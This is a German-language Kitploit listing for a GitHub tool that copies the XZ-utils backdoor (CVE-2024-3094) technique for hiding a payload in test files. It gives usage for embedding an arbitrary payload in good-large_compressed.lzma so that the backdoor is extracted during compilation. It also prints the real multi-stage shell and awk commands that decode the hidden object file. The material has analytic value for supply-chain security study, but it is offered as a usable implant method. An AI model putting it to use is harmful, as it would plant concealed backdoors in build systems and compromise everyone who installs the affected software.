Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
xzutils_backdoor_obfuscation — Skript zur Verschleierung eines Payloads auf die gleiche Weise wie beim XZ-utils-Angriff (CVE-2024-3094) | Kitploit
Tools/GitHubGitHub/thomrgn/xzutils_backdoor_obfuscation
ExploitationReverse EngineeringMalware-AnalyseLieferkettensicherheitLernen & BildungPayload-EntwicklungBinary-Exploitation
GitHubthomrgn/xzutils_backdoor_obfuscation

xzutils_backdoor_obfuscation

Skript zur Verschleierung eines Payloads auf die gleiche Weise wie beim XZ-utils-Angriff (CVE-2024-3094)

Repository anzeigen
3vor 10 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

xzutils_backdoor_obfuscation

Dieses Skript reproduziert die Verschleierungstechnik, die beim XZ-utils-Angriff (CVE-2024-3094) verwendet wurde. Es wurde nur für xzutils v5.6.0 getestet.

⚠️ Dieser Code dient ausschließlich zu Bildungszwecken und sollte nicht für böswillige Aktivitäten verwendet werden. Nutzung auf eigene Gefahr. ⚠️

Voraussetzung

Sie müssen die originale good-large_compressed.lzma von xzutils 5.6.0 in Ihrem Arbeitsordner haben.

Verwendung

Führen Sie Folgendes aus: ./obfuscate_payload.sh [your_payload]

Eine Datei good-large_compressed.lzma.modified wird erstellt, die im Ordner test/files des xzutils 5.6.0-Quellcodes unter dem Namen good-large_compressed.lzma abgelegt werden muss. Die Backdoor wird dann während des Kompilierungsprozesses extrahiert.

Einschränkungen

Dieser Code wurde mit einer bearbeiteten liblzma_la-crc64-fast.o derselben Größe wie das Original getestet. Die Verwendung einer größeren Datei funktioniert möglicherweise nicht, da die Nutzlastgröße begrenzt ist.

Deobfuskation der Nutzlast

Dieser Teil ist optional; er zeigt, wie die Nutzlast aus good-large_compressed.lzma deobfuskiert wird. Sie können es mit der Originaldatei oder mit einer mit diesem Projekt erstellten Datei verwenden.

Voraussetzung

Sie müssen die Originale good-large_compressed.lzma und bad-3-corrupt_lzma2.xz von xzutils 5.6.0 in Ihrem Arbeitsordner haben.

Schritt 1: Extraktion des in bad-3-corrupt_lzma2.xz versteckten Skripts

root@kitploit:~
gl_am_configmake=bad-3-corrupt_lzma2.xz
gl_path_unmap='tr " \t_\-" "\t \-_"'  # Reverse the character mapping
gl_prefix=`echo $gl_am_configmake | sed "s/.*\.//g"
gl_reverse_config="sed ':a;N;\$!ba;s/\n//g' $gl_am_configmake | eval $gl_path_unmap"
eval $gl_reverse_config

Dies gibt Ihnen ein Bash-Skript, das Schritt 2 ausführt.

Schritt 2: Extraktion des zweiten in good-large_compressed.lzma versteckten Skripts

Führen Sie den folgenden Code aus, der aus der Ausgabe von Stufe 1 stammt:

root@kitploit:~
export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 		>/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +724)";(xz -dc good-large_compressed.lzma|eval $i|tail -c +31265|tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377")|xz -F raw --lzma1 -dc

Dies gibt Ihnen ein weiteres Bash-Skript, das Schritt 3 ausführt.

Schritt 3: Extraktion der in good-large_compressed.lzma versteckten Nutzlast

Führen Sie den folgenden Code aus, der aus der Ausgabe von Stufe 2 stammt:

root@kitploit:~
W=88792
N=0
p="good-large_compressed.lzma"
i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +724)"

xz -dc $p | eval $i | LC_ALL=C sed "s/\(.\)/\1\n/g" | LC_ALL=C awk 'BEGIN{FS="\n";RS="\n";ORS="";m=256;for(i=0;i<m;i++){t[sprintf("x%c",i)]=i;c[i]=((i*7)+5)%m;}i=0;j=0;for(l=0;l<4096;l++){i=(i+1)%m;a=c[i];j=(j+a)%m;c[i]=c[j];c[j]=a;}}{v=t["x" (NF<1?RS:$1)];i=(i+1)%m;a=c[i];j=(j+a)%m;b=c[j];c[i]=b;c[j]=a;k=c[(a+b)%m];printf "%c",(v+k)%m}' | xz -dc --single-stream | ((head -c +$N > /dev/null 2>&1) && head -c +$W) > liblzma_la-crc64-fast.o || true

Dies extrahiert die verschleierte Nutzlast liblzma_la-crc64-fast.o

Tool herunterladen